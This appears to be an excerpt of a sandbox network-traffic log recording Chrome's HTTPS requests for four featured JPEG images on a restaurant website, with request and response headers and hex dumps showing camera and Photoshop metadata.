                                                                                                                                                    2024-10-01 04:26:30 UTC642OUTGET /assets/imgs/featured-image-01.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:30 UTC353INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:30 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 23:53:10 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 54948
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:30 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:30 UTC16384INData Raw: ff d8 ff e1 28 39 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 11 01 00 00 03 00 00 00 01 17 70 00 00 01 01 00 03 00 00 00 01 0f a0 00 00 01 02 00 03 00 00 00 03 00 00 00 da 01 06 00 03 00 00 00 01 00 02 00 00 01 0f 00 02 00 00 00 06 00 00 00 e0 01 10 00 02 00 00 00 12 00 00 00 e6 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 f8 01 1b 00 05 00 00 00 01 00 00 01 00 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 01 08 01 32 00 02 00 00 00 14 00 00 01 2a 02 13 00 03 00 00 00 01 00 02 00 00 9c 9d 00 01 00 00 00 02 00 00 00 00 87 69 00 04 00 00 00 01 00 00 01 40 88 25 00 04 00 00 00 01 00 00 05 2c 00 00 05 40 00 08 00 08 00 08 43 61 6e 6f 6e 00 43 61 6e 6f 6e 20 45 4f 53 20 32 30 30
                                                                                                                                                    Data Ascii: (9ExifMM*p(1"2*i@%,@CanonCanon EOS 200
                                                                                                                                                    2024-10-01 04:26:30 UTC6016INData Raw: dc cb 0e d6 5a c2 c7 3b f7 4f 35 3c c7 ee 58 ab b6 63 5e 63 5f 8a 12 80 26 ef cd 74 66 40 a5 ae 71 bf 22 cb 20 80 f3 3a f9 79 fe 72 87 a2 1c d9 3f 24 47 3b 6f 99 3d 94 89 da d2 7f 74 27 2d 69 be b2 cf 30 3f 09 51 d1 5b b0 b7 6f a7 cb 9c 35 f2 1e 6a a9 69 04 83 c8 d1 02 95 35 9b 8c 00 ac e2 e2 3e eb 99 4d 64 6f b0 ed 04 9d ad 1d dc fb 1d f9 b5 56 df 7d af fc ca d0 e9 80 d2 7b b8 fe 45 7b 16 a7 3b 1b 22 ca da eb 2e 71 66 33 1a d0 49 1e a9 fd 26 dd bf 49 ef db 5e 2b 2b ff 00 bb 17 24 02 0b 3c 1c fc 5c 3c 9b bf 46 ec 8c 3b 99 e8 ba 4e d7 b8 34 87 37 21 bb fd ac dd 6b 77 fa 1f e8 ff 00 47 ff 00 08 93 7a 8f 4e a6 d0 f6 53 63 83 75 6b 5c 1a 0e ef cd dd 0e da a8 93 ac 78 ea 27 bf c1 3b 4e de 44 83 df b8 40 c4 13 6b 84 88 7f ff d4 e2 7a cf d5 ce b5 d2 dc 5d 97 8c
                                                                                                                                                    Data Ascii: Z;O5<Xc^c_&tf@q" :yr?$G;o=t'-i0?Q[o5ji5>MdoV}{E{;".qf3I&I^++$<\<F;N47!kwGzNScuk\x';ND@kz]
                                                                                                                                                    2024-10-01 04:26:30 UTC16384INData Raw: 4c 65 6e 73 3d 22 45 46 2d 53 31 38 2d 35 35 6d 6d 20 66 2f 34 2d 35 2e 36 20 49 53 20 53 54 4d 22 20 61 75 78 3a 4c 65 6e 73 53 65 72 69 61 6c 4e 75 6d 62 65 72 3d 22 30 30 30 30 30 61 39 31 35 30 22 20 65 78 69 66 45 58 3a 4c 65 6e 73 4d 6f 64 65 6c 3d 22 45 46 2d 53 31 38 2d 35 35 6d 6d 20 66 2f 34 2d 35 2e 36 20 49 53 20 53 54 4d 22 20 70 68 6f 74 6f 73 68 6f 70 3a 44 61 74 65 43 72 65 61 74 65 64 3d 22 32 30 32 33 2d 30 38 2d 31 39 54 31 36 3a 32 35 3a 35 39 2e 30 36 35 22 20 70 68 6f 74 6f 73 68 6f 70 3a 43 6f 6c 6f 72 4d 6f 64 65 3d 22 33 22 20 70 68 6f 74 6f 73 68 6f 70 3a 49 43 43 50 72 6f 66 69 6c 65 3d 22 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 22 20 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3d 22 61 64 6f 62 65 3a 64 6f 63 69
                                                                                                                                                    Data Ascii: Lens="EF-S18-55mm f/4-5.6 IS STM" aux:LensSerialNumber="00000a9150" exifEX:LensModel="EF-S18-55mm f/4-5.6 IS STM" photoshop:DateCreated="2023-08-19T16:25:59.065" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:DocumentID="adobe:doci
                                                                                                                                                    2024-10-01 04:26:30 UTC16164INData Raw: 97 74 a4 8b 58 d5 1b 2a 17 29 2d dc c0 c1 67 25 06 cf 86 89 3b 5e be 2c 15 9b 2d 3f 95 0e 9f 71 65 c8 dc 8b 1d fc b3 c1 22 ae a3 32 49 a9 de a2 4d 0b 2c 6d 26 70 90 44 f2 49 5c bc 37 fb a8 fe f1 b2 61 21 55 7f 0d b9 ce 1d 2b 9f a3 bc bd bd f8 0b 7d 6b 4f 11 ea f7 57 44 41 12 dc 5b 02 8a 50 83 db 8b 34 2a 33 1e d3 3b c9 eb 61 b5 48 ba f3 1f 36 f2 c6 a7 a9 dc 4b 0f 88 f6 d6 36 72 80 64 b4 cf 79 28 46 28 52 43 11 8c 04 5c de a2 23 76 7d e7 bc c4 cc 55 5e 2e 65 f0 ad 2f ef 8c 9c dd 78 e1 23 89 61 75 b1 95 12 ed e3 4f 5e 6c c6 4d a4 b4 72 66 44 ce 99 7d 8c 4c aa cb cd 97 bc af af f2 3d a6 9f a1 dd db 6b f7 f6 b0 a4 8b 6f 6a e1 e7 b6 58 d5 73 4a a1 ca cc ae ad ec 87 76 ed 7d db 2e 2c 46 1a 79 a2 66 d8 f1 00 7a 4a 93 4d 9d 55 c7 3c 28 7b fd 4d ef 0c 4b 42 b1 d0
                                                                                                                                                    Data Ascii: tX*)-g%;^,-?qe"2IM,m&pDI\7a!U+}kOWDA[P4*3;aH6K6rdy(F(RC\#v}U^.e/x#auO^lMrfD}L=kojXsJv}.,FyfzJMU<({MKB


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    29192.168.2.449776162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:30 UTC642OUTGET /assets/imgs/featured-image-04.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:30 UTC353INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:30 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 23:51:58 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 46125
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:30 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:30 UTC16031INData Raw: ff d8 ff e1 20 b7 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 11 01 00 00 03 00 00 00 01 17 70 00 00 01 01 00 03 00 00 00 01 0f a0 00 00 01 02 00 03 00 00 00 03 00 00 00 da 01 06 00 03 00 00 00 01 00 02 00 00 01 0f 00 02 00 00 00 06 00 00 00 e0 01 10 00 02 00 00 00 12 00 00 00 e6 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 f8 01 1b 00 05 00 00 00 01 00 00 01 00 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 01 08 01 32 00 02 00 00 00 14 00 00 01 2a 02 13 00 03 00 00 00 01 00 02 00 00 9c 9d 00 01 00 00 00 02 00 00 00 00 87 69 00 04 00 00 00 01 00 00 01 40 88 25 00 04 00 00 00 01 00 00 05 2c 00 00 05 40 00 08 00 08 00 08 43 61 6e 6f 6e 00 43 61 6e 6f 6e 20 45 4f 53 20 32 30 30
                                                                                                                                                    Data Ascii: ExifMM*p(1"2*i@%,@CanonCanon EOS 200
                                                                                                                                                    2024-10-01 04:26:30 UTC16384INData Raw: e8 6f 72 db a7 a4 75 1b 29 07 17 1b 33 3d a7 fc 2e 36 35 c5 ba ff 00 c2 5d 4d 7f e7 2d 86 7d 65 c9 ac 7e a3 76 55 80 81 b8 e3 b9 d4 52 5d 1e e8 c8 b7 d3 77 a7 bb e8 fb 15 3c be a1 d5 73 5d 39 37 c0 3c 07 39 f9 4e ff 00 3f 2d fe 87 f9 8c 4d b0 ba 8b 5b f6 57 50 73 4d 57 33 1f 12 b6 ea 5d 91 78 73 da 7f 97 8f 87 f6 9c 86 3b db f9 d4 ab 1d 2e be 97 8b 91 ba 9c 87 75 0c 86 89 03 1e b7 1a d8 48 db bd 94 d5 ea ba e7 ff 00 a3 b3 2e fc 5a ea ff 00 b8 ef 55 6c c7 0f 70 f5 01 b9 cd d5 a6 e3 bc 02 7f 76 9f 66 33 7f ed 94 73 5d 94 61 d9 75 87 73 2a 61 70 ab 86 e9 fb b4 88 67 fd 04 d9 48 af 8c 47 57 57 f6 c6 55 12 ea 3d 2c 5f 4b 47 5d 91 63 5c e0 7f e2 69 73 eb 6f fd 76 f5 cc 66 d1 8b 93 92 f3 d3 2f 0e 74 6e b2 b6 34 d7 5e f3 26 c1 8a cf f0 75 ff 00 c1 7f 37 fe 89 43
                                                                                                                                                    Data Ascii: oru)3=.65]M-}e~vUR]w<s]97<9N?-M[WPsMW3]xs;.uH.ZUlpvf3s]aus*apgHGWWU=,_KG]c\isovf/tn4^&u7C
                                                                                                                                                    2024-10-01 04:26:30 UTC13710INData Raw: da 83 51 a2 0f 1b 47 96 f0 c8 0a 95 36 04 f7 1e 86 a2 9f 86 2c 74 8c 96 60 c4 82 0a 9e 86 e2 d6 ab 12 bd 3b d3 5c a4 93 f0 98 b2 16 3e 64 6b e5 3f bd 34 fc d5 e6 df 5e ae 9a de 8b 3f c6 39 60 4c 87 eb a4 85 a3 47 9c e0 69 21 1e e2 45 6b 09 94 e4 e4 19 92 cd 2b 12 3b d8 9f d3 57 08 03 64 a9 5d 5a ae 0c 82 f3 a1 d6 f5 40 86 48 26 d7 d2 ae 10 64 99 6d 41 31 28 ec 06 8a 9a b1 3d 86 80 ca ac 47 c3 44 c0 91 86 0a e3 a5 ed a7 7e b4 13 11 ee b7 5a b0 58 e2 62 4a 0a b2 6a 48 aa b2 2e 31 f0 3c e7 49 1f 5d 83 a7 ba ab 58 0e 38 37 e6 07 2b e0 dd f9 cd 54 03 9e 8d 21 93 f7 7a 81 f1 5b db 43 04 71 14 c8 be 11 72 46 86 8b 85 8c 51 4f 8b 2e d3 e2 b8 06 f5 65 6b 03 e6 44 92 0f c4 6c 08 0d 95 87 4a 64 c2 b3 2b 26 24 58 ed ab 2d d4 9e ef 6d 32 96 2a b9 1c 56 8f 69 63 7f 32
                                                                                                                                                    Data Ascii: QG6,t`;\>dk?4^?9`LGi!Ek+;Wd]Z@H&dmA1(=GD~ZXbJjH.1<I]X87+T!z[CqrFQO.ekDlJd+&$X-m2*Vic2


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    30192.168.2.449778162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:30 UTC642OUTGET /assets/imgs/featured-image-02.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:30 UTC353INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:30 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:05:18 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 45010
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:30 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:30 UTC16031INData Raw: ff d8 ff e1 28 d6 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 02 a6 00 00 01 01 00 03 00 00 00 01 01 c4 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d6 87 69 00 04 00 00 00 01 00 00 00 ec 00 00 01 24 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 30 37 3a 32 36 20 32 31 3a 34 30 3a 31 31 00 00 00 00 04 90 00 00 07 00
                                                                                                                                                    Data Ascii: (ExifMM*(1"2i$''Adobe Photoshop CC 2015 (Windows)2022:07:26 21:40:11
                                                                                                                                                    2024-10-01 04:26:30 UTC16384INData Raw: b4 be 8a 9c ed db 6b ef 07 df bb fa ea 1d 37 ea de 1b 7a 73 f1 b3 08 b1 83 5a e7 43 b7 f3 53 f4 f1 d4 b1 e9 f4 b1 2d 2c 64 c3 26 63 fa d0 a4 f6 89 9c 27 90 71 c6 31 20 43 6a 3d da a7 2c 04 65 ed 13 19 71 59 94 ba 8f 07 5d fd 3f 0f a3 54 0b 5a e7 30 e9 20 4b be 21 70 bf 5a c6 76 71 39 5d 2f 1e eb 31 9b ab df 5b 4c 00 3f 3b 6e 8b af 7e 17 52 bd 9b 5f 78 b6 d7 18 75 b6 02 40 f8 06 9f 6a b7 ba dc 37 37 12 e6 31 ed 7c 90 e6 82 38 fc dd a5 4c 6e 5a 70 70 42 24 55 8e ac 23 21 87 a8 4b 8a 66 c1 b7 c9 ba 7e 76 45 64 5f 66 35 d7 37 80 ef 4d e4 7f 9d b5 43 aa 75 a7 e6 3a 18 c1 50 1a 10 04 1f c5 7a 7f 50 eb 39 38 56 50 2d e9 97 7d 8d e4 33 ed 72 3d 36 93 fb cd 04 ba b5 cf fd 66 e9 38 3d 4b 2d 9f 66 af 7e 65 c3 db 5d 60 17 11 ce e7 c7 fe 7c 7a 13 8e 38 ec 2e 43 53 1e
                                                                                                                                                    Data Ascii: k7zsZCS-,d&c'q1 Cj=,eqY]?TZ0 K!pZvq9]/1[L?;n~R_xu@j771|8LnZppB$U#!Kf~vEd_f57MCu:PzP98VP-}3r=6f8=K-f~e]`|z8.CS
                                                                                                                                                    2024-10-01 04:26:30 UTC12595INData Raw: 8b 16 12 e4 d8 67 fd 7b d3 b0 b2 b6 1c ed f5 b4 6a 46 e3 87 3f d8 dc 61 4b 95 5b 59 5e 03 6b d7 3a fd b2 dd d5 d7 af 53 60 4e fb 74 5b e7 6b 2a a1 ba e7 ae 90 da 23 da dc 62 ac 16 82 77 13 49 9d a3 49 b1 b3 56 98 4b a9 4c 65 0b 4d 41 d8 5d 77 b3 68 22 ca bb 2a aa 3c a5 a9 8d 83 a7 45 61 98 3d 32 c5 9b dd 8a a1 6b 36 74 fb 6e ba 80 d4 ee 5a 9b f5 b6 4d 6e db 34 7a 66 a6 b6 c3 5e 9a f5 db d6 f4 ef a9 4d d7 ab 51 69 3a 18 9e d3 5d 4f bf b9 b1 66 fe af 79 6d a6 36 2a bb 09 8e 1b c8 d2 5c 4b bb 26 81 fa ab 7f a3 76 01 45 7a 88 df 38 08 4c 9c 3a e4 ed 54 3b 6a 4c a5 52 ae e7 5f 63 6b 5d d4 ed a5 89 f3 2d ae ba 8d 94 27 56 ed 7a 09 4b 39 27 59 89 9a c5 e0 4b 99 99 74 8a f7 5b 7f 88 aa f2 ab d5 f5 1a 25 0d ab 1b 4d 9d 5b 43 b2 b3 68 d1 bc fd 91 5e a8 60 ed 1a 51
                                                                                                                                                    Data Ascii: g{jF?aK[Y^k:S`Nt[k*#bwIIVKLeMA]wh"*<Ea=2k6tnZMn4zf^MQi:]Ofym6*\K&vEz8L:T;jLR_ck]-'VzK9'YKt[%M[Ch^`Q


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    31192.168.2.449779162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:30 UTC642OUTGET /assets/imgs/featured-image-03.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:30 UTC353INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:30 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 23:56:52 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 80554
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:30 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:30 UTC16031INData Raw: ff d8 ff e1 29 a2 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 11 01 00 00 03 00 00 00 01 17 70 00 00 01 01 00 03 00 00 00 01 0f a0 00 00 01 02 00 03 00 00 00 03 00 00 00 da 01 06 00 03 00 00 00 01 00 02 00 00 01 0f 00 02 00 00 00 06 00 00 00 e0 01 10 00 02 00 00 00 12 00 00 00 e6 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 f8 01 1b 00 05 00 00 00 01 00 00 01 00 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 01 08 01 32 00 02 00 00 00 14 00 00 01 2a 02 13 00 03 00 00 00 01 00 02 00 00 9c 9d 00 01 00 00 00 02 00 00 00 00 87 69 00 04 00 00 00 01 00 00 01 40 88 25 00 04 00 00 00 01 00 00 05 2c 00 00 05 40 00 08 00 08 00 08 43 61 6e 6f 6e 00 43 61 6e 6f 6e 20 45 4f 53 20 32 30 30
                                                                                                                                                    Data Ascii: )ExifMM*p(1"2*i@%,@CanonCanon EOS 200
                                                                                                                                                    2024-10-01 04:26:30 UTC16384INData Raw: d2 7e df ce fa 1f f1 8a 98 19 0e cb b5 d8 f5 3a c3 00 0d ac 36 00 5f b0 32 5a d6 bb dd f9 ac fd f5 b9 89 f5 61 ef ac 3f 3e e7 e2 dc 61 b5 62 d3 58 b5 cd 83 ee 7d cd 7d 9f 43 e9 fe 85 96 fa 89 65 9c 61 21 29 4c 44 7e ef 54 e3 12 90 22 31 32 5f a7 bb fc 9b 89 ff 00 12 d4 47 bb dc 3e 1f c4 a3 33 a6 5f 8b 45 38 ed 7b 6e 6d 60 54 d7 8d cc 2e 20 96 7f 37 73 58 e6 fb be 9a 05 f5 59 4d af ae e6 9a ec ae 5b 63 0e 8e 04 7d 26 aa d6 0c a4 46 ba b7 e3 a4 62 0e f4 12 d6 db 0e d1 5b 45 a4 82 e7 56 d2 4b da 3f 31 cf 03 da c6 3d df eb 5a 3d 36 35 e2 5a 7e 89 2d 70 d4 10 e1 1b 9a 67 fa ca 54 d9 95 85 7b 32 2e c7 6e 4b 69 63 58 2b f4 ff 00 40 e2 5a 1f 57 ac c7 39 ff 00 45 b6 6f f5 3f d2 a1 1c 6c a6 d7 f6 86 b0 b1 84 97 fa 6d 20 c1 3a b9 b4 b7 6f a8 ec 7f e4 6f 4c bb 17 dc
                                                                                                                                                    Data Ascii: ~:6_2Za?>abX}}Cea!)LD~T"12_G>3_E8{nm`T. 7sXYM[c}&Fb[EVK?1=Z=65Z~-pgT{2.nKicX+@ZW9Eo?lm :ooL
                                                                                                                                                    2024-10-01 04:26:30 UTC16384INData Raw: 2f 2a 8c cb f4 aa 16 43 d2 ac ad 93 31 b0 ba 87 21 12 fc b1 b7 f0 65 fd 35 aa 9f d0 75 59 5a c6 43 ed 2f d8 ad a8 de 42 59 82 15 71 f0 59 2b 06 11 de 59 4d 6a d5 db bd 76 3f 83 0a 8f db aa fa b4 e5 1f b8 2b 5a 52 84 c6 05 d1 3b 6b 32 42 82 01 db 7d 0a 66 ca 70 19 59 31 a2 5b 39 e3 b8 82 dd 2e 27 8c 31 83 cd 01 a3 46 2b 4e e6 8c d4 3f 5f 84 1d ab b9 e9 4d 3a 95 7d 07 56 dd 89 b7 16 fe bc 34 12 c0 9c 78 8d cf de 9f f9 3f 53 79 3f 10 b6 e2 38 dc 06 3f 11 2d 85 f7 1c b0 ca b7 9b 0b 3b b5 db bc c8 d3 79 a8 d1 12 48 8b 73 41 ec d6 ca ce 9c 6b 52 13 3b 57 88 f3 cb aa b6 57 b5 29 44 0c 0e 44 65 da ba d8 7a cf cc 65 92 fe 0f e4 18 1b 37 b8 61 33 aa db ce 0c bf 08 61 51 e6 fc 54 24 ec 74 49 b6 8e c5 4f 2e 73 5c ee c3 25 d6 d7 d4 4e 52 f0 3e 3a d3 05 c6 d6 1c 84 ce
                                                                                                                                                    Data Ascii: /*C1!e5uYZC/BYqY+YMjv?+ZR;k2B}fpY1[9.'1F+N?_M:}V4x?Sy?8?-;yHsAkR;WW)DDeze7a3aQT$tIO.s\%NR>:
                                                                                                                                                    2024-10-01 04:26:30 UTC15252INData Raw: 00 db 7e 6f f7 b5 51 ea 47 8f dd db bf 2c bf 8b 35 a9 fd 19 e1 93 75 6f cf fe 1c 97 ff d6 f3 63 3b 78 59 26 96 64 68 84 b8 eb 6e f8 64 14 21 8c 43 e1 3b ed b0 d5 4d 30 19 b3 65 aa 72 c1 f7 0c 15 73 ca f3 f0 b8 bb 96 06 58 ec da 75 92 15 03 e1 0d 25 47 71 f1 1a 8a ac 9b 04 86 96 af 36 c5 da e2 ef b6 d3 cb 8f fe 4e 15 ed 32 2a d4 96 5e a6 a0 68 40 09 3b d4 91 90 a4 5b 2d ea dd 87 b0 c3 49 6b 3d f8 79 a5 98 c4 16 d2 55 ed 01 09 5a 96 3d e6 94 af 42 bb f8 1d 0d eb 54 15 63 03 bc 3a b3 36 d4 0d 39 4e 3b b0 4b dc 35 f8 b6 e4 90 c1 72 2b 69 91 9d 71 f7 a1 b6 01 66 56 8d 58 f8 54 35 34 7f 34 b6 f5 68 cb 4f dd 1c 47 57 e0 99 c8 ef bf 4d 73 12 7e d9 79 4f 5e 47 a8 af 51 70 1c 8d 26 f4 8f 0d cb f9 40 12 da f0 fb 79 2d f2 f9 55 9d ed 9e de 6c 67 f0 8d c8 9e 2a b2 9f
                                                                                                                                                    Data Ascii: ~oQG,5uoc;xY&dhnd!C;M0ersXu%Gq6N2*^h@;[-Ik=yUZ=BTc:69N;K5r+iqfVXT544hOGWMs~yO^GQp&@y-Ulg*
                                                                                                                                                    2024-10-01 04:26:30 UTC16384INData Raw: 40 5c de 18 82 cc 00 e3 90 de 55 22 3f 4e fd 47 c8 e5 e5 c5 43 c4 b3 19 1c c4 2a 5e 4b 04 b5 9f cd 55 53 da 4b 2c a9 1f 6e fb 6f ab 78 4a 19 44 80 aa 2a d6 d2 35 4e 41 b7 ba a0 72 cb c4 c7 cd fe 5f 9f 1b 7b 16 67 07 24 91 66 2d a6 85 a1 31 4c bb 14 73 20 14 2a 7d da 3e de 81 67 2c aa ae 6f 21 f9 5c f6 04 ab ca 65 3b c9 69 2e 23 8d 88 a3 41 00 ee 3f a5 ba 6a d6 95 1e 1f 35 43 75 74 07 e6 ea 1f 55 2f 82 5e 16 cd 5d a3 16 2b 34 00 06 04 93 55 6f f5 1d 41 cd 69 b5 20 77 14 47 b7 ab 19 5c 4e 27 6c 7b 8a 69 c8 bb 95 e9 45 f9 7f 02 46 aa 69 15 a5 ad 16 40 71 56 d1 a6 4b 3a cc 9d e2 5b b0 e3 b6 94 a9 84 6f bf eb d1 75 a6 f1 87 00 ab 6d e9 b4 ea 9d f2 1d c8 d0 b7 50 28 eb f0 11 d0 8a 8f d7 aa dd 78 ab 5f 4f 05 2e 34 16 f8 fb a6 85 e4 84 79 8a 43 46 ec b4 65 52 6a
                                                                                                                                                    Data Ascii: @\U"?NGC*^KUSK,noxJD*5NAr_{g$f-1Ls *}>g,o!\e;i.#A?j5CutU/^]+4UoAi wG\N'l{iEFi@qVK:[oumP(x_O.4yCFeRj
